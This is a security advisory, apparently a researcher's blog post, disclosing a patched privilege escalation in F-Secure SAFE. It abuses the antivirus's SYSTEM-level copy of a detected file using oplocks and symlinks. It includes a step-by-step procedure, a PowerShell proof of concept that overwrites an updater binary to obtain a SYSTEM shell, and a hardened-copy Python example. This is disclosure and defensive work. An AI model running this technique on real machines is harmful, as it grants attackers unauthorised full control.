F-Secure SAFE arbitrary file copy Elevation of Privilege

Published on Wed 20 March 2019 by @clavoillotte

Product: F-Secure SAFE Antivirus (CS and PSB Computer Protection were also affected)

Type: Local Privilege Escalation

Summary: A privileged file copy performed by SAFE when an infected file is detected can be abused to overwrite an arbitrary file. This can be used by an unprivileged user to obtain SYSTEM privileges on the local machine.

This vulnerability is patched, and the update should be automatically deployed to clients.

Description

When an infected file is detected, SAFE will attempt to delete it. The first attempt will impersonate the unprivileged user account; if the file is not removed it will retry without impersonation, and make a temporary copy of the file. These operations will be performed by a privileged process running as SYSTEM (fshoster64.exe).

The operations performed (that are relevant for this vulnerability) can be summarized as follows:

  1. Check infected_file.exe properties (and its parent directories’), impersonating user (no more impersonation from this point forward)
  2. Log stuff in C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log (or path in UssRemovalLogger registry key)
  3. Read infected_file.exe content & properties
  4. (Do some other operations for ~1 minute)
  5. Read infected_file.exe content & properties
  6. Log stuff in C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log again
  7. Copy infected_file.exe to infected_file.exe.uss_dis in the same directory
  8. Read infected_file.exe / infected_file.exe.uss_dis content & properties
  9. Remove infected_file.exe.uss_dis
  10. Remove infected_file.exe

A general explanation on privileged file operation bugs is available here.

This behavior can be abused by an unprivileged user to create, overwrite or delete arbitrary files with SYSTEM privileges. Indeed, the user can replace the files (infected and copy) by pseudo-symbolic links to arbitrary files just before the copy operation (after step 6, before step 7) so that the copy operation overwrites an arbitrary file – and then change the link before the delete operation (step 9) to prevent removal.

As an example, to overwrite C:\Path\target.exe with the content of C:\Path2\source.exe, an unprivileged user can:

  • Create directory C:\Windows\Temp\Test
  • Create the EICAR file named C:\Windows\Temp\Test\eicar.txt
  • Wait a bit for the first entry to removal.log to be created
  • Place an oplock #1 on removal.log to let other operations take place up to step 6 and block the thread
  • Oplock #1 triggers
  • Replace C:\Windows\Temp\Test\eicar.txt by a symlink to C:\Path2\source.exe
  • Create a symlink C:\Windows\Temp\Test\eicar.txt.uss_dis resolving to C:\Path\target.exe
  • Place an oplock #2 on C:\Path\target.exe
  • Release oplock #1
  • SAFE copies eicar.txt to eicar.txt.uss_dis, which actually means source.exe is copied to target.exe
  • Oplock #2 triggers
  • Change symlink C:\Windows\Temp\Test\eicar.txt.uss_dis to resolve to a non-existent file
  • Release Oplock #2
  • SAFE attempts to delete eicar.txt.uss_dis, deletion fails
  • SAFE deletes eicar.txt (i.e. source.exe)

So target.exe is overwritten with the content of source.exe (with SYSTEM privileges).
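
The copy pattern behind this bug, next to a handle-based alternative, as an added example that is not part of the original advisory and not F-Secure's code. It is a POSIX analogue written in Python (O_NOFOLLOW, O_EXCL and inode identity stand in for the Windows equivalents); the function names, file names and directory layout are constructed for illustration.

```python
import os, shutil, stat, tempfile

SUFFIX = ".uss_dis"  # temporary-copy suffix named in the advisory

def naive_temp_copy(path):
    """Path-based copy to a predictable name; follows a link planted at dst."""
    dst = path + SUFFIX
    shutil.copyfile(path, dst)
    return dst

def hardened_temp_copy(path, expected_id):
    """Copy only if path is still the (st_dev, st_ino) recorded at check time."""
    src_fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)  # refuse a link as source
    try:
        st = os.fstat(src_fd)
        if not stat.S_ISREG(st.st_mode) or (st.st_dev, st.st_ino) != expected_id:
            raise PermissionError("source changed between check and copy")
        # O_EXCL fails if anything, even a dangling link, already exists at dst.
        dst_fd = os.open(path + SUFFIX,
                         os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
        with os.fdopen(dst_fd, "wb") as out:
            while chunk := os.read(src_fd, 65536):
                out.write(chunk)
    finally:
        os.close(src_fd)
    return path + SUFFIX

def run_scenario(hardened):
    """Constructed scenario: a link already sits at the temporary-copy path.
    Returns (bytes left in the protected file, whether the copy was refused)."""
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "protected", "target.bin")
        sample = os.path.join(root, "work", "sample.txt")
        for path, data in ((target, b"ORIGINAL"), (sample, b"SAMPLE")):
            os.mkdir(os.path.dirname(path))
            with open(path, "wb") as f:
                f.write(data)
        st = os.lstat(sample)                # identity recorded at check time
        os.symlink(target, sample + SUFFIX)  # link planted before the copy
        refused = False
        try:
            if hardened:
                hardened_temp_copy(sample, (st.st_dev, st.st_ino))
            else:
                naive_temp_copy(sample)
        except OSError:
            refused = True
        with open(target, "rb") as f:
            return f.read(), refused
```

O_NOFOLLOW only covers the final path component, so a privileged service should also keep its temporary copies in a directory the user cannot write to, or perform the copy with the user's own privileges.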

Proof of Concept

The following PowerShell code (and tools from the symboliclink-testing-tools toolkit) can be used to perform the above.

You’ll need 2 PowerShell consoles. On the first console, enter:

PS C:\> New-Item -Type Directory -Force C:\Windows\Temp\Test
PS C:\> 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | Out-File -encoding ascii -FilePath C:\Windows\Temp\Test\eicar.txt -NoNewline
PS C:\> Sleep 5
PS C:\> path\to\SetOpLock.exe C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log

Wait for the Oplock to trigger (1-2 minutes in my tests), then on the second console, enter:

PS C:\> Remove-Item -Recurse -Force C:\Windows\Temp\Test
PS C:\> path\to\CreateSymlink.exe -p C:\Windows\Temp\Test\eicar.txt path\to\GetSystemShell.exe
PS C:\> path\to\BaitAndSwitch.exe C:\Windows\Temp\Test\eicar.txt.uss_dis "C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe" C:\Windows\Temp\dummy.txt

The following video shows this PoC used to replace a SAFE updater binary C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe with a program that pops up a SYSTEM shell:

Fix

The vendor has released a patch through update channels that should have been deployed automatically on affected systems.

References

No CVE or vendor advisory was issued.

Timeline

2018-07-10: Initial report sent to vendor

2018-07-11: Vendor acknowledges reception of report

2018-07-30: Vendor confirms a fix is in progress

2018-07-30: Information request sent to vendor regarding other impacted product

2018-07-30: Vendor acknowledges the request

2018-08-07: Vendor releases updates through auto-update channels

2018-08-09: Vendor response confirming the fix and the other impacted products, asking for test of the fix

2018-08-09: Mail sent to vendor confirming the fix

2018-08-21: Mail from vendor informing that the bug has been granted a reward through their VRP

2019-03-20: Publication of this advisory